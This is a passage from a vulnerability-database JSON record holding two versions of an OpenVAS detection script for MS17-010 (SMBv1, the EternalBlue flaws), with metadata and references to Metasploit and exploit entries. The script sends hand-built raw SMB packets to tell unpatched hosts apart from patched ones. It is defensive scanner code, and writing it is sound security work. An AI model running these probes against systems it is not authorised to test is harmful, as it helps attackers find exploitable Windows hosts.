details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"$Revision: 7543 $\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\n\n Impact Level: System\");\n\n script_tag(name:\"affected\", value:\"\n Microsoft Windows 10 x32/x64 Edition\n Microsoft Windows Server 2012 Edition\n Microsoft Windows Server 2016\n Microsoft Windows 8.1 x32/x64 Edition\n Microsoft Windows Server 2012 R2 Edition\n Microsoft Windows 7 x32/x64 Edition Service Pack 1\n Microsoft Windows Vista x32/x64 Edition Service Pack 2\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"Run Windows Update and update the\n listed hotfixes or download and update mentioned hotfixes in the advisory\n from the below link, https://technet.microsoft.com/library/security/MS17-010\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name : \"URL\" , value : \"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name : \"URL\" , value : \"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name : \"URL\" , value : \"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n## Variable Initialization\nname = \"\";\nsmbPort = \"\";\nsoc = \"\";\nsmb_neg_resp = \"\";\nsmb_sess_resp = \"\";\nsmb_sess_andx_resp = \"\"; \nsmb_trans_resp = \"\";\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) + \n raw_string( 0x80, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xc7, 0x00, 0xa1,\n 0x5f, 0x30, 0x5d, 0xa2, 0x5b, 0x04, 0x59, 0x4e,\n 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x48,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x49,\n 0x00, 0x00, 0x00, 0x05, 0x02, 0x08, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00,\n 0x77, 0x24, 0xb3, 0x5b, 0xd0, 0xee, 0x67, 0x99,\n 0xa6, 0x5b, 0x68, 0xa4, 0x4f, 0x0e, 0xeb, 0x56,\n 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00, 0x64, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x53, 0x00, 0x65, 0x00, 0x72, 0x00,\n 0x76, 0x00, 0x69, 0x00, 0x63, 0x00, 0x65, 0x00,\n 0x20, 0x00, 0x50, 0x00, 0x61, 0x00, 0x63, 0x00,\n 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00, 0x20, 0x00,\n 0x32, 0x00, 0x36, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x00, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x35, 0x00, 0x2e, 0x00,\n 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_andx_req );\n\n## SMB\tSession Setup AndX Response\nsmb_sess_andx_resp = smb_recv( socket:soc );\nif( ! smb_sess_andx_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Tree Connect AndX Request, Path: \\\\xxx.xxx.xxx.xxx\\IPC$\nsmb_tree_resp = smb_tconx( soc:soc, name:name, uid:uid, share:\"IPC$\" );\nif(! smb_tree_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract Tree ID from SMB Tree Connect Response\nif(smb_tree_resp && strlen(smb_tree_resp) > 29)\n{\n tid_low = ord(smb_tree_resp[28] );\n tid_high = ord(smb_tree_resp[29] );\n}\nelse {\n exit(0);\n}\n\n# SMB Pipe PeekNamedPipe Request, FID: 0x0000\nsmbtrans_request = raw_string(0x00, 0x00, 0x00, 0x4a, 0xff, 0x53, 0x4d, 0x42, \n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00)+raw_string(tid_low, tid_high) +\n raw_string( 0xf5, 0x5e)+raw_string(uid_low, uid_high) +\n raw_string(0x26, 0x76, 0x10, 0x00, 0x00, 0x00, \n 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, \n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x4a, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x02, \n 0x00, 0x23, 0x00, 0x00, 0x00, 0x07, 0x00, 0x5c, \n 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00);\n\nsend( socket:soc, data: smbtrans_request);\nsmb_trans_resp = smb_recv( socket:soc );\nif(strlen( smb_trans_resp ) < 39)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Trans Response, Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{ \n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\t\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:19:53"}, {"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "365c5063d96a4f6fe8f9af69e4ef98abe381e50d44784ebf7ac71bb624960572", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2020-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-05T17:28:22", "history": [], "viewCount": 54, "enchantments": {"dependencies": {"modified": "2020-06-05T17:28:22", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-05T17:28:22", "rev": 2, "value": 7.8, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810676\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-05 10:05:11 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 17:51:25 +0530 (Wed, 22 Mar 2017)\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted SMB transaction request\n with fid = 0 and check the response to confirm the vulnerability.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also\n could lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"https://github.com/rapid7/metasploit-framework/pull/8167/files\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_smb_version_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"smb_v1/supported\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nname = kb_smb_name();\nsmbPort = kb_smb_transport();\n\nif(!name || !smbPort){\n exit(0);\n}\n\nsoc = open_sock_tcp( smbPort );\nif( ! soc ) exit( 0 );\n\n## SMB Negotiate Protocol Request\nsmb_neg_req = raw_string(0x00, 0x00, 0x00, 0x85, 0xff, 0x53, 0x4d, 0x42,\n 0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x62, 0x00, 0x02,\n 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f,\n 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52,\n 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02,\n 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e,\n 0x30, 0x00, 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f,\n 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,\n 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70,\n 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61, 0x00, 0x02,\n 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30,\n 0x32, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41,\n 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54,\n 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32,\n 0x00);\n\nsend( socket:soc, data:smb_neg_req );\n\n## SMB Negotiate Protocol Response\nsmb_neg_resp = smb_recv( socket:soc );\nif( ! smb_neg_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_NEGOTIATE\nsmb_sess_req = raw_string(0x00, 0x00, 0x00, 0xec, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6,\n 0x00, 0x00, 0x40, 0x00, 0x0c, 0xff, 0x00, 0x00,\n 0x00, 0x00, 0x44, 0x01, 0x00, 0x01, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x4a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0xdc, 0x02, 0x00, 0x80, 0xb1, 0x00, 0x60,\n 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05,\n 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e, 0x30,\n 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01,\n 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x2a, 0x04,\n 0x28, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x82, 0x08,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x05, 0x01, 0x28, 0x0a, 0x00, 0x00, 0x00,\n 0x0f, 0x00, 0x57, 0x00, 0x69, 0x00, 0x6e, 0x00,\n 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x30, 0x00, 0x30, 0x00,\n 0x32, 0x00, 0x20, 0x00, 0x53, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x76, 0x00, 0x69, 0x00, 0x63, 0x00,\n 0x65, 0x00, 0x20, 0x00, 0x50, 0x00, 0x61, 0x00,\n 0x63, 0x00, 0x6b, 0x00, 0x20, 0x00, 0x32, 0x00,\n 0x20, 0x00, 0x32, 0x00, 0x36, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x00, 0x00, 0x57, 0x00, 0x69, 0x00,\n 0x6e, 0x00, 0x64, 0x00, 0x6f, 0x00, 0x77, 0x00,\n 0x73, 0x00, 0x20, 0x00, 0x32, 0x00, 0x30, 0x00,\n 0x30, 0x00, 0x32, 0x00, 0x20, 0x00, 0x35, 0x00,\n 0x2e, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend( socket:soc, data:smb_sess_req );\n\n## SMB Session Setup AndX Response, NTLMSSP_CHALLENGE,\n## Error: STATUS_MORE_PROCESSING_REQUIRED\nsmb_sess_resp = smb_recv( socket:soc );\nif( ! smb_sess_resp )\n{\n close( soc );\n exit( 0 );\n}\n\n##Extract UID from Session Setup AndX Response\nif(smb_sess_resp && strlen(smb_sess_resp) > 33)\n{\n uid_low = ord(smb_sess_resp[32]);\n uid_high = ord(smb_sess_resp[33]);\n uid = uid_high * 256;\n uid += uid_low;\n}\nelse {\n exit(0);\n}\n\n## SMB Session Setup AndX Request, NTLMSSP_AUTH, User: \\\nsmb_sess_andx_req = raw_string(0x00, 0x00, 0x01, 0x02, 0xff, 0x53, 0x4d, 0x42,\n 0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x42, 0x53, 0x52, 0x53, 0x50, 0x59,\n 0x4c, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc5, 0xa6)\n + raw_string(uid_low, uid_high) +\n raw_string( 0x80, 